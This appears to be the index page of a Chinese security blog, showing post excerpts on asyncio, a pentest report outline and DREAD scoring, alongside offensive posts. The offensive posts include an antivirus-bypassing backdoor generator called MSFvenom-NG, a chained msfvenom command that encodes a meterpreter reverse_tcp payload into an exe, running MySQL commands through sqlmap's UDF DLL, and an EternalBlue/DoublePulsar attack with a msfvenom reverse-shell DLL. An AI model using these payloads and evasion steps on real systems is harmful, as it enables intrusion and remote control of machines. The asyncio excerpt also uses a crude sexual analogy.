python asyncio

| 热度 | 字数统计: 581 字 | 阅读时长: 3 分

asyncio 是在 Python 3.4 中引入的异步 IO 标准库.

简单介绍一下什么是同步 IO / 异步 IO.

1
2
同步 IO: 你去约女朋友啪啪啪, 你需要一直等着她来, 之后你才能和她♂.
异步 IO: 你去约女朋友啪啪啪, 在她来的路上你不用一直等着, 可以去买套套什么的.

Read More

MSFvenom-NG

| 热度 | 字数统计: 85 字 | 阅读时长: 1 分
1
2
3
4
5
           ___
_____ ___| _|_ _ ___ ___ ___ _____
| |_ -| _| | | -_| | . | |
|_|_|_|___|_| \_/|___|_|_|___|_|_|_|
MSFvenom-NG

这应该会是我持续更新的一个项目.

1
2
3
MSFvenom-NG 是一款交互式 Windows (EXE/DLL Powershell) 后门生成工具

支持自定义编码规则 Bypass 杀毒软件

MSFvenom-NG

msfvenom multiple encode

| 热度 | 字数统计: 172 字 | 阅读时长: 1 分

除第一次需要指定 payload 外, 其他都用 -p - 代替, 多重编码需要指定 --platform-a 并用 -f raw 输出, 最后一次编码更改为 -f exe.

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -e x86/jmp_call_additive -i 2 -a x86 --platform windows -f raw | msfvenom -p - e x86/alpha_upper -i 1 -a x86 --platform windows -f exe > msf.exe

Read More

简单的渗透测试报告

| 热度 | 字数统计: 163 字 | 阅读时长: 1 分

这份渗透测试报告是之前帮一个朋友写的, 敏感信息已经被我抠出来了, 只有框架.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
1 项目概述

1.1 渗透测试目的
1.2 渗透测试范围
1.3 渗透测试工具
1.4 渗透测试组织
1.5 渗透测试原则

2 渗透测试方法

2.1 工具自动分析
2.2 人工手动分析
2.3 风险评估

3 网站漏洞详情

4 总结

.1 网站目前安全现状
.2 存在问题和整改建议

渗透测试报告.docx

DREAD 风险评估

| 热度 | 字数统计: 290 字 | 阅读时长: 1 分

微软的 DREAD 模型.

高危: 12-15分, 中危: 8-11分, 低危: 0-7分.

等级 高(3) 中(2) 低(1)
Damage Potential 获取完全验证权限; 执行管理员操作; 非法上传文件 泄露敏感信息 泄露其他信息
Reproducibility 攻击者可以随意再次攻击 攻击者可以重复攻击, 但有时间限制 攻击者很难重复攻击
Exploitability 初学者在短期内能掌握攻击方法 熟练的攻击者才能完成这次攻击 漏洞利用条件非常苛刻
Affected users 所有用户, 默认配置, 关键用户 部分用户, 非默认配置 极少数用户, 匿名用户
Discoverability 漏洞很明显, 攻击条件很容易获得 在私有区域, 部分人能看到, 需要深入挖掘漏洞 发现该漏洞极其困难

Read More

sqlmap udf dll decode

| 热度 | 字数统计: 29 字 | 阅读时长: 1 分

udf/mysql/windows/32/lib_mysqludf_sys.dll_

用 extra/cloak 下的 cloak.py 解码

cloak.py -d -i lib_mysqludf_sys.dll_

mysql 导入执行

select sys_eval('whoami');

ms17-010 attack bat

| 热度 | 字数统计: 561 字 | 阅读时长: 3 分

提取了 NSA 工具包里的 Eternalblue 和 Doublepulsar.

Target 分为 XP 和 WIN72K8R2.

第一次打的时候会蓝屏, 大约 10 秒后服务器重启, 打到第二次就成功了.

生成 dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > bakdoor.dll

payload 设置为 windows/x64/shell_bind_tcp 可以通过 netcat 连接, 也能用 windows/exec 直接添加账户.

Read More